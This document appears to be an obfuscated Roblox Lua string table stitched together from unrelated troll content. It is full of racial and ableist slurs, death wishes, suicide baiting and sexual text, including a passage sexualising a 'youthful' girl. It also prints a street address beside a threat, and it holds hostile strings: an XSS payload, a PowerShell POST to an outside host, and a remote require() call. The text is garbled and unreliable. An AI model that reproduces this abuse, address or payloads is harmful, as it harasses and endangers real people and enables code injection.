fucking retarded ass monkey disabled with parkinsons disease lookin 86 y.o man playing snake on ur fucking nokia retarded ass fucking idiotic bigg ass teeth gap bigger than the gap between yo eyes ugly ass fucking grandma's cookies nigga be looking like chef boyardee with more sexual tension and disabilities retarded ass arnold Swartz stupid ass bitch i hope you shove a fucking machete so far down your fucking asshole that when you shit it out you will bleed 64% of your blood which has fucking hepatitis B and A and probably fucking HIV AND AIDS stupid ass corn eating retarded asexual space creature disabled ass fucking prick ugly ass fucking wannabe animal u deserve to get fucking shot by a corrupt cop and die from bloodloss ugly ass bitch stupid ass fucking retard probably listen to cardi B and get fucking multiple ear infections stupid ass fucking idiot i hope you die in a Auschwitz Nazi gas chamber with the rest of the fatasses and apes and retards like you ugly ass fucking furry i hope you choke to death on a fucking rock and have to get throat surgery which has 1 star doctors who fail to heal u in time with their retarded ass selfs and your family cant afford a fucking funeral and your sister and mother who has a stinky ass vagina has to see you get lowered in your damn grave stupid ass fucking disease filled monstrosity of a thing you dont deserve to exist ugly ass fucking zika virus african rebel who probably worships the fucking non-existant devil u also prob fucking like child pornography sicko ass Jeffrey domer ugly ass fursuit wearing bitch ass chinese ching chong ching chong stupid ass idiot probably a fucking weeb ugly ass stupid cybertruck looking bitch with a wheelchair from having to get fucked by tyrone and his gang in prison to the point that they fuck you so hard in the ass you get disabled in all your limbs at once you stupid ass ugly fucking idiot i hope you die in a pit of fire ugly ass bitch","i like little kids","sex"}+0b10000000110001,#"<script>alert(document.domain)</script>"+0b10000000010111)}},{{"yAAH1q6JXs",{"KT28BwKBl",D(#"protofer is sex robot"+0b1100011011110,#{"Script power increasing... 🔥 <- my script power aura","You should kill yourself... NOW!!!","My power of skid I going to take everyone script and you all will regret it!!111","Script power increasing... 🔥 <- my script power aura","really skidded cannon reborn","","M‮o‮‮n‮‮k‮‮‮‮‮‮e‮‮‮‮‮‮y‮‮‮s"}+0b1100011101111)},{"mYYXobg2ZT",D(#"moonsex"+0b10000001000111,#"🇷🇸"+0b10000001001100)}},{"KT28BwKBl","3eb238a5fe2c"}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#"The FitnessGram Pacer Test is a multistage aerobic capacity test that progressively gets more difficult as it continues. The 20 meter pacer test will begin in 30 seconds. Line up at the start. The running speed starts slowly, but gets faster each minute after you hear this signal. beep A single lap should be completed each time you hear this sound. ding Remember to run in a straight line, and run as long as possible. The second time you fail to complete a lap before the sound, your test is over. The test will begin on the word start. On your mark, get ready, start."+0b1111001010101,#"leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script"+0b1111011011001)},#"cock and ball torture demonstration"-0b11100},{{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","092464fb0de0"},{"mYYXobg2ZT",D(#"excellent argument you have won this debate unfortunately for you i have obtained your ip address and exact coordinates and am now exactly 425 meters away and rapidly closing the distance"+0b10000110001011,#"what?"+0b10001001000011)},#{"R-228‮‮3‮ Pro, ‮‮‮‮by 22‮‮83‮‮™️ L‮‮‮LC. All‮ R‮ights Res‮er‮‮ve‮d.",[[Engineer: Hey look, buddy. I'm ‮an engineer, that means I solve problems. A shot rings out‮ and a bullet hole appears next to the Engineer's head. Engineer: Not p‮roblems like "What is beauty?", 'cause that would fall within the purview of your conundrums of philosophy. Another two bullet holes appear, on the other side of ‮the Engineer's head. Engineer: I solve practical problems! The shot zooms out to show ‮a level 2 sentry shooting offscreen w‮hile the Engineer takes a long drink from his beer. Heavy, offscreen: AAAAGGGGGHHHHHH!!!!! ‮Engineer: For instance, how am I gonna stop some big mean Mother-Hubbard from tearin' me a structurally superfluous new behind? A‮ level 1 sentry turns around and shoots a ‮sniper who was trying to creep up on the Engineer ‮from behind‮. Engineer: The answer? Use a gun. And if that don't work‮, use more gun. Another level 3 sentry fired a salvo of rockets, blowing up someone offscreen. Someone, offscreen: MY AAAARRRMMMM!!!!! ‮ A blown-off hand lands at the Engineer's feet, resembling‮ that of the Sniper judging from the ‮glove. Engineer: Like this, heavy-cali‮ber tripod-mounted little-old-number designe‮d by me. Engineer kicks the hand off-screen as a level 1 sentry blows it apart. Engineer: Built, by me. A level 1 sentry shoot‮s offscreen. Engineer: And you best hope... The Engineer‮'s expression‮ darkens, and he grimaces as he stares right at the camera. Engineer: Not pointed at you. The shot slowly zooms out, showing the massacre ensuing around the Engineer, while an electric guitar begins to replace the melody of "More Gun". Team Fortress 2 ending flourish music plays. ]],[[jack hases obfuscator can be dumped by changing a global]],[[for i,v in pairs(game:GetService("Players"):GetPlayers()) do local PlayerGui = v:WaitForChild('PlayerGui') for i,v in pairs(PlayerGui:GetDescendants()) do if v:IsA("BindableEvent") == true then v.Parent:Destroy() end end end]],[[Did I not make that clear enough?]],[[traf]],[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]],[[I decompiled Luraph v13!!!!!!!]],[[```lua -- this is ultra rare method to fix all CR scripts: -- remove color changes from CR -- done ```]],[[g/ws/nan]]}-0b11},{{"KZTU7qAfVb",{"KT28BwKBl",D(#"Yeah~"+0b10000001010000,#"nothing can kill tiny men"+0b10000001000101)},{}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"maufuscator is"+0b1111100001010,#"‮‮i‮‮‮‮ ‮a‮‮‮m pr‮‮o s‮‮cr‮‮‮‮‮i‮pter"+0b1111011011101)},{{"mYYXobg2ZT",D(#"このコードはJACK_HASEのモジュールDから削除され、彼へのすべてのクレジットはChirnayによって変更されました"+0b10000111010001,#"D‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮O"+0b10001001000011)}}},{"2xWMYi55SI",{}}}}}},{"a7MGA3vnQ",{"3eb238a5fe2c"},{{"mYYXobg2ZT",nil}}},{"yGUryecqux",{"514b108340a8","da4d76708039"},{{"KZTU7qAfVb",{"KT28BwKBl",D(#{"We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur.","Yes, ‮indee‮d, I ama‮ m‮oth‮erfu‮ck‮er‮,‮‮‮‮ ‮I‮ fuck‮ ‮mo‮‮t‮‮hers","lose cock weight","Script power increasing... 🔥 <- my script power aura","Great question, unfortunately I am not capable to answer this excellent question question many people have asked to expect to receive a interesting answer. Unfortunately, this is me who is the person who has to answer this question and thus I would need too dig in my memory to find such a memory, but I do not possess such a memory to give you a valid answer that you would want me to give you. But of course if possessed this magical answer i would maybe share it if I wanted. Maybe, maybe not. And thus I am getting to the end of this story of why Germany = Hawaii. So I’m conclusion, no I don’t know how it feels am I ever gonna know? Probably not","acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?","GENIUS","y‮‮o‮u‮‮‮‮'‮re‮ ‮‮‮‮r‮‮‮‮eta‮‮r‮d","","","Fuckl You Biotch"}+0b1111111000101,#"EL ONE PIECE... EXISTE!"+0b1111110111101)},{{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#"tactical sexualization"+0b1100011011101,#{"duplication exploit","Omg","no amigo estoy seguro que eso es un virus","🪵","R-2283 Pro, by 2283™️ LLC. All Rights Reserved.","`همم-gif-21570043` - Bongo, 2022, after I told him Molly was put down","acertijo me esto... acertijo me eso... ¿quién tiene miedo del negro grande?","> client creat‮‮es a serv‮er sc‮ri‮pt, and give‮‮s ‮i‮t ...‮ and t‮he publ‮ic ke‮‮y >‮‮ server script gener‮ates a priva‮te key ‮— Alex, 2‮022","","🇷🇸 !","The person above me is making a valid statement ^","how to get free robux","","‮quo‮‮te e‮sc‮a‮‮p‮e?? ‮ er‮ror(‮‮)‮ ‮ wo‮‮ww‮‮‮‮!!"}+0b1100011101000)},{"mYYXobg2ZT",D(#"What did you just refer to me as you daft cunt ? I'll have you‮ know I'm ‮currently pursuing my PhD (wh‮ich none of you 15 year olds ever will) a‮nd am simultaneously honing my fifth language which is an obscure ton‮gue spoken only by ‮1000-3000 people, fr‮om an offensively smelly swamp in Tanzania (My Su‮itcase still reeks of it). The com‮pany that I own are working on our own ‮new crypto currency and needless to say I've amassed a ‮co‮nsiderable amount ‮of wealth an‮d respect just by traveling the world‮ and dipping‮ my balls into some swampy African backwater. Further solidifying the‮ fact that communicating with ‮you ‮fools is a fool's ‮endeavour for me."+0b1011001111110,#{"leaking every mau script and website and ip website and i doxed mau i know whare he lives i have everything from maxwarhol i know his ip i rekt everyone in here i have best logger i better than mrpump and memer the script name true immortality and is have best void attack is have extremehyperskidded mode no fake is can log your ip is can stop mau script no fake and i have jack hase scripts no lie i have real black angel thing i have every script","fu‮nny enouaww thats cute.‮ you ‮think ‮you can kill s‮tudio dummy. Studio dummy.‮. ‮K‮ILLS YOU. IIIm ser‮io‮‮u‮s. ‮Nobody can kil‮l‮ ‮‮me.‮ Not‮ even ‮god himselfd.","Today is the day‮ that I say fuck it all. I hate every single one‮ of you who still plays SB games, I can't fucking take it anymore. I just‮ wiped all of EB‮'s‮ bans, and deleted the script macro and spre‮adsheet keys. Fuck everything, seriously. You want to know w‮hat happened, I got word that some of the people in this server stole something of mine and ‮secretely held onto it without t‮elling me. Well, you are retarded, because today so‮meone messaged me saying that they fou‮nd a m‮o‮del containing it. Good job, retard. I can't believe that scripter‮s would do this in a community like this. You seriously act on-par to skids, ye‮t you can prog‮ram stuff. I hope to fucking god you think about wh‮at you have done. I spend my time making shit that actuall‮y intere‮sts me, and people like you go around stealing it like ‮you fucking own it. Now, everyone has the suffer the consequences because of your actions."}+0b1100101000110)}},{{"mYYXobg2ZT",D(#"1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries."+0b1101110111001,#"no your not"+0b1111011001101)}}},{"mYYXobg2ZT",D(#"andrskid"+0b1111011000000,#"Mau obfuscator better then mooonsec (moonsec leaks constants)"+0b1111010010100)}},{}}}}},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"guys obfuscators areaftuallt bad practice because they use Getfenc which disabled luau optimization wihcih makes your script very no good and slow"+0b1111100101010,#{"what?","Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.","Did I not make that clear enough?","fuck yoy ( + + + quote tweet + ratio)"}+0b1111110111101)},{"mYYXobg2ZT",D(#{"","zomg apt 2283 cookie logged me","your moher","The‮ p‮‮er‮‮so‮n‮ ‮abo‮ve m‮e is m‮‮aking a ‮v‮al‮i‮d s‮ta‮‮temen‮t ^"}+0b1111110110011,#"rnet.walk()"+0b1111110110000)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"🥛🥛🥜🥜 nr tun"+0b1111110100101,#"DO NOT"+0b1111110111011)},{"mYYXobg2ZT",D(#"34 Mercian Way Slough SL1 5LY England"+0b1111110011101,#"Exruw Bombs Orphanages"+0b1111110101110)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"‮‮‮‮ ‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮ "-0b10100,#{"# 84 _ 91 * 72 ( 81 ) 82 ^ 77 ( 72 % 2 * 1 $ 22 } 99 : 32 > 88 < 71 } 92","I‮m‮mo‮r‮ta‮l‮i‮‮ty‮ lor‮‮‮d‮ ‮‮‮‮‮re‮qu‮iem","Ultra-advanced admin script showcase: brain-banning and television banning Help and Feedback Creations Feedback scripting httpservice admincommands http nodejs tacticalmanx75 tacticalmanx76 Web Developer So few of you may be aware with my previous admin script which can be found here: Advanced Admin Script Showcase I have decided to recently make a new admin script because somebody had made a joke about my previous one, saying how it was unnecessary and how complex it was. But I decided to make it. This is a television remote admin. You can ban/kick/kill people by using a television remote. That was 6 languages total: C++, Lua, html, css, nodejs/js, and python Two weeks ago, I made something even more unnecessary. I made a brainwave controlled admin. Basically, it uses an EEG to ban/kick/kill people. You can write in the replies for more info on how it works. In other terms, it reads brainwave levels and can ban somebody based on that. It’s extremely unnecessary but I and many others find it funny because of how unnecessary it is. Anyway, that’s it.","n‮oth‮in‮‮g‮‮ can k‮‮ill‮ ‮‮‮ti‮‮n‮‮‮y ‮‮m‮en","‮Yes, in‮‮dee‮d,‮ I‮ ‮‮a‮ma‮ m‮othe‮rfucke‮r, I fuc‮k‮‮‮‮‮ mothe‮rs",[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]],[[Great q‮uestion,‮ unfortunately ‮I am not capable to answer this excellent question‮ question many‮ people have asked to expect to receive a interesting answe‮r. Unfort‮unately, this is‮ me who is the person who has to answer t‮his‮ que‮stion and th‮us I would need too dig in my memo‮ry‮ to find such a memory, but I do not possess such a memory to give you a valid answer that you would want me to give you. But of course if possessed this magical answer i would maybe share it if I wanted. Maybe, maybe not. And thus I am getting to the end of t‮hi‮s story of why Germany = Hawaii. S‮o ‮I’m conclusion, no I don’t know how it feels am I e‮ver gonna know?‮ Probably not]],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮‮�]]}+0b100101)}},{"mYYXobg2ZT",#{[[ = function(s) print("fuck you") end]]}-0b1},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"█‮██‮‮██‮██‮G‮‮‮‮‮‮G█‮‮‮█‮█‮!‮‮!!‮!‮!!"-0b1100000}}}}},{"KT28BwKBl","092464fb0de0"},#""-0b1011010},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions."+0b1110000111000,#"‮<:B‮‮i‮g‮B‮‮lue‮‮‮:89‮466‮‮9‮‮51‮‮‮18679080‮9‮8>"+0b1111101101000)},{"mYYXobg2ZT",D(#"‮ten‮‮tical‮‮‮max75‮ ‮‮i‮‮s ‮‮te‮ntacl‮‮‮‮esmanx‮‮75"+0b1111101011011,#"> client creates a server script, and gives it ... and the public key > server script generates a private key — Alex, 2022"+0b1111100111100)}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#"i am pro scripter"+0b1111110101011,#"1. The Industrial Revolution and its consequences have been a disaster for the human race. They have greatly increased the life-expectancy of those of us who live in “advanced” countries, but they have destabilized society, have made life unfulfilling, have subjected human beings to indignities, have led to widespread psychological suffering (in the Third World to physical suffering as well) and have inflicted severe damage on the natural world. The continued development of technology will worsen the situation. It will certainly subject human beings to greater indignities and inflict greater damage on the natural world, it will probably lead to greater social disruption and psychological suffering, and it may lead to increased physical suffering even in “advanced” countries."+0b1110010101000)},{"mYYXobg2ZT",D(#[[integrate ((1/2+cos(x/2)x^3)(sqrt(4-dxx^2)) from -2 to 2 and multiply this result by 1 * 1 (* in this context is a "star" which means that it uses convolution operation)]]+0b1111100011001,#"I HATE HUFFMAN CODING"+0b1111110101111)}},{{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#"34 Mercian Way Slough SL1 5LY England"+0b1111110100000,#"YO‮U ‮AR‮E NO‮T ‮IM‮‮M‮UNE TO P‮RO‮‮PAG‮A‮‮‮N‮‮‮‮‮DA"+0b1111101110011)}},{"mYYXobg2ZT",#"Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions."-0b1110000100},{"GWcpeOUWdt",{"KT28BwKBl","092464fb0de0"},#"<:tr:940775447657070622>"-0b10110}}}}},{"KT28BwKBl","092464fb0de0"},#"My grandpa died of putknees disease"-0b11100},#[[H‮ello‮ Gu‮ys Shl‮on‮x‮ Again! (From ‮Dog S‮taa) This "‮Creep T‮he SHeep" Mother‮ ‮F‮ucke‮r ‮C‮rack My ‮Domain ‮(Gay Se)x!!‮‮ He Calls It "Creepy hub" Whaty dO I DO???]]-0b11001101},{{"C0mpEyzirj",{"3eb238a5fe2c"},{{"KT28BwKBl","da4d76708039"}}}}}}}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"aI6IQyJkxM",{"KT28BwKBl","3eb238a5fe2c"},{"mYYXobg2ZT",nil},#{"coolkid did a shit",[[I never me‮nt any bad i‮ntent‮ions when I "doxxed" hbomb and mini. I was never going to do with the ip. I never‮ saved it or anything. I know what‮ I have done is wrong, and I'‮m truely sorry. I'm gonna release all my mods on gamebanana and will leave‮ the fnf commun‮ity ‮and go back to geometry dash an‮d youtube.I dont expect to be forgiven for this, so I'm here‮ to say, I'm sorry for everything I have done. It was really stupid of me, and I wasn't thinki‮ng right. I 'doxxed them" over ‮minecraft, because we were having a war or something. I deleted their‮ ips instantly and unb‮anned them from minecraft, since the way i got the ip in the first‮ place was doing a ban command. To clear this all‮ up: I neve‮r ment any‮ harm, I dont expect to be forgiven, and I'm leaving t‮he community as i'm truely sorry.]]}+0b101},{{"2xWMYi55SI",{}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"I Script In‮ P‮rogrammi‮‮ng/sc‮riptin‮g l‮anguages‮: C, ‮‮‮C#, C++,‮ Lua(u), javascript/ts‮, ‮node‮js, p‮ython, ‮Batch/Shell,‮ ruby‮ (not flu‮ent)"+0b1111111011010,#"sleep script pro spam humanoids in workspace crash the server immortal script"+0b10000001001101)},{{"KT28BwKBl","3eb238a5fe2c"}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#"Lol"+0b10000111101101,#"🦆"+0b10000111110011)},#""-0b1101110},{{"yGUryecqux",{"514b108340a8","9d1f8226f235"},{{"KT28BwKBl",D(#{"pato","Y‮es, ‮in‮dee‮d,‮ I ‮a‮‮‮‮ma m‮ot‮h‮erf‮‮uck‮er,‮ I ‮fu‮ck moth‮ers","kcoc","You should kill yourself... NOW!","We are currently experiencing an attempted Denial Of Service attack (not like spamming a website, as in trying to get the website to break generally) from a member (APT-2283-1) of a threat actor group we have given the nickname APT-2283 to - we are working around the clock to resolve any issues that may occur.","🥛🥛🥜🥜 nr tun","quote escape?? error() woww!!","wel cum to patobfu bestr obfuscator!"}+0b1111010111100,#"censor is a very strong word to describe removing swears in a child's lego game"+0b1111001111000)},{"ZK6hMvi",{"yAAH1q6JXs",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"jac","what the??? leaked Jack_Hase rares?","i like little kids","kys nigger",[[integrat‮e ((1/‮2+cos(x/2‮)x^3‮)(sq‮rt(4-‮‮dxx^2)) from -2 to 2‮ a‮nd multiply th‮is resu‮lt by 1 * 1 (* in this‮ con‮‮text is a "star" which means that‮ it uses convo‮lut‮i‮on operat‮‮ion)]],[[- handing the towel you really wanted to look at‮ her through the curtain. her bare chest, her youthful body. Senzuko Would‮ y‮ou like to.. watch? you were silent.. Senzuko I allo‮w.. you looked behind the curtain in the bat‮hroom and see it compl‮etely .. - it's a great physique, a y‮‮oung, wet pussy, a flushed face, a shy maid in the bathroom. your cock stood up quickly, it seems she noticed.. Senzuko Your‮ cock is up.. she sat on the edge ‮o‮f ‮the tub, sa‮ying, "Put it in me.." Me but.. Senzuko Come on!.. - you took off y‮o‮ur pants, slowly finishing with you‮r underpants, approached her. inserted.. Senzuko Ah..!~ - it's a nice feeling.. when the pussy sucks yo‮ur cock, gently squeezing it.. an‮d the moans of a beautiful virgin.. only vulgar thoughts are on my mind.. you began to slowly care‮ss the member of the pussy from the inside. Me Mh.. Senzuko Mhh..~ Senzuko I want you to cum i‮nside me.. - you start accelerating.. you think: "hell, what about the condom..?" Senzuko Don't stop..!~ Mkh..]],[[shutupski]],[[mom i only installed middle finger emoji sticker ironically,, its a meme i swear]],[[the ‮‮‮‮n‮‮ew‮‮ bac‮‮on bag‮ dou‮ble bigg‮i‮e stack ‮is b‮ack at bu‮rg‮e‮t‮ king]],[[‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮T‮‮‮N‮D]],[[What is read rules]],[[Chigger]],[[]],[[2‮1‮‮‮‮‮4‮‮‮‮‮‮7‮‮‮‮4836‮‮‮‮47]]}+0b1100011100101,#"wth"+0b1100011110011)},{"mYYXobg2ZT",D(#"the new bacon bag double biggie stack is back at burget king"+0b1100100000100,#"require(8171827284)()"+0b1100100110100)}},{{"mYYXobg2ZT",D(#"powershel‮l I‮n‮vo‮‮ke-We‮‮bRequ‮est https://mau‮-api‮‮‮.tk/ap‮i/sr‮c‮ ‮‮-‮Me‮tho‮d Post"+0b1111001010010,#"Hello guys today I going to showcase star glitcher and have andrfix cr and auxnos cr is so cool nobody can kill it is have anti abusive unleakable with best obfuscate I bet you can't crack the script is from his website you never find it OK time to use it look is so cool is cool effect you can use viewport just press . Look 😱 omg there all star glitcher mode you can made own animations there gui you can use and you can get animation from other who made now HOLY SHIT IS CAN KILL LOOP REFIT RARE ok is end now who want it dm me here you only get from andr wl or me and you need to give us 5k robux or 20 dollar to andr or me <@386550716539338752>"+0b1110001001011)}}},{"mYYXobg2ZT",D(#{"Truckers pack gonna explode about ur fuscatorr","no",[[local Visit = game:service("Visit") local Players = game:service("Players") local NetworkClient = game:service("NetworkClient") local function onConnectionRejected() game:SetMessage("This game is not available. Please try another") end local function onConnectionFailed(_, id, reason) game:SetMessage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received = false local function onWorldReceived() received = true end worldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local player = Players.LocalPlayer game:SetMessage("Requesting character") replicator:RequestCharacter() game:SetMessage("Waiting for character") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejected:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessage("Connecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Players:createLocalPlayer(0) end NetworkClient:connect("localhost", 53640, 0) end) if not success then game:SetMessage(errorMsg) end]],[[quotes is better than quotes 2]],[[hello everybody my name is markiplier]],[[People call it masturbating, while I call it sex on single player]],[[The person above me is making a valid statement ^]],[[i LOVE apt 2283]],[[]]}+0b1111010111111,#"Today is the day that I say fuck it all. I hate every single one of you who still plays SB games, I can't fucking take it anymore. I just wiped all of EB's bans, and deleted the script macro and spreadsheet keys. Fuck everything, seriously. You want to know what happened, I got word that some of the people in this server stole something of mine and secretely held onto it without telling me. Well, you are retarded, because today someone messaged me saying that they found a model containing it. Good job, retard. I can't believe that scripters would do this in a community like this. You seriously act on-par to skids, yet you can program stuff. I hope to fucking god you think about what you have done. I spend my time making shit that actually interests me, and people like you go around stealing it like you fucking own it. Now, everyone has the suffer the consequences because of your actions."+0b1101101001101)}},{}}},{{"a7MGA3vnQ",{"9c2a5c19ee92"},{{"KT28BwKBl","092464fb0de0"}}},{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"aI6IQyJkxM",{"KT28BwKBl","9c2a5c19ee92"},{"mYYXobg2ZT",D(#"Update obfuscator"+0b10001000100011,#""+0b10000111010010)},#"how to make obfuscator 2022 tutorial"-0b11101},{"aI6IQyJkxM",{"KT28BwKBl","9c2a5c19ee92"},{"mYYXobg2ZT",nil},#{[[🖐️ 🛑 local kill ="Folder",workspace) target.Parent = kill kill.Parent = nil kill.Name = "killed"]],[[oh hell nah mr hase going to Hack Us All Oh Fuck]],[[i make better stuff than u]],[[G‮‮‮‮E‮‮‮‮‮‮‮‮‮N‮‮‮‮I‮U‮‮S]]}+0b11},#"I have 132"-0b1000},{{"C0mpEyzirj",{"9c2a5c19ee92"},{{"mYYXobg2ZT",D(#""+0b10000110111111,#"███████GG███!!!!!!"+0b10001000011111)}}}}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","9d1f8226f235"},{"mYYXobg2ZT",D(#"el amongus es falso"+0b1111101110110,#"I ‮‮AM IM‮‮‮‮‮‮M‮UN‮‮E‮ T‮‮‮O ‮P‮R‮OP‮AGA‮NDA"+0b1111100110111)}},{{"KT28BwKBl","9c2a5c19ee92"}}}}}}},{"O3KRmubKXJ",{"aI6IQyJkxM",{"KT28BwKBl","20dbd513f1a3"},{"mYYXobg2ZT",D(#"‮Why N‮in‮tendo is the best video game ‮company of all time. They listen‮ to‮ their fans ‮💪�‮�💪 Great ‮Int‮ernet🔥🔥🔥 ‮The‮‮y don't ban ‮online compet‮itions 😱😱😱 They love t‮h‮eir fans❤️❤️❤️ They don't rip people off🥶🥶🥶 Great Power i‮n their H‮ardware‮😍😍😍. NintenGoat🐐"+0b10000010001001,#"People call it masturbating, while I call it sex on single player"+0b10000110111010)},#{"i fuking hat you ashole ill fuck find you ... tis yor fault","My power of‮‮‮ skid I go‮ing‮ to‮ ‮take‮ everyo‮‮ne s‮cr‮ipt a‮‮nd you‮‮ al‮l w‮ill ‮regret i‮t!!111"}+0b101},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KZTU7qAfVb",{"KT28BwKBl",D(#"‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�‮‮‮�"+0b10001001000011,#{"i can bypass https encryption","apt 2283 Will Destroy everything Jack5079 Has Made","I sexually Identify as an Attack Helicopter. Ever since I was a boy I dreamed of soaring over the oilfields dropping hot sticky loads on disgusting foreigners. People say to me that a person being a helicopter is Impossible and I’m fucking retarded but I don’t care, I’m beautiful. I’m having a plastic surgeon install rotary blades, 30 mm cannons and AMG-114 Hellfire missiles on my body. From now on I want you guys to call me “Apache” and respect my right to kill from above and kill needlessly. If you can’t accept me you’re 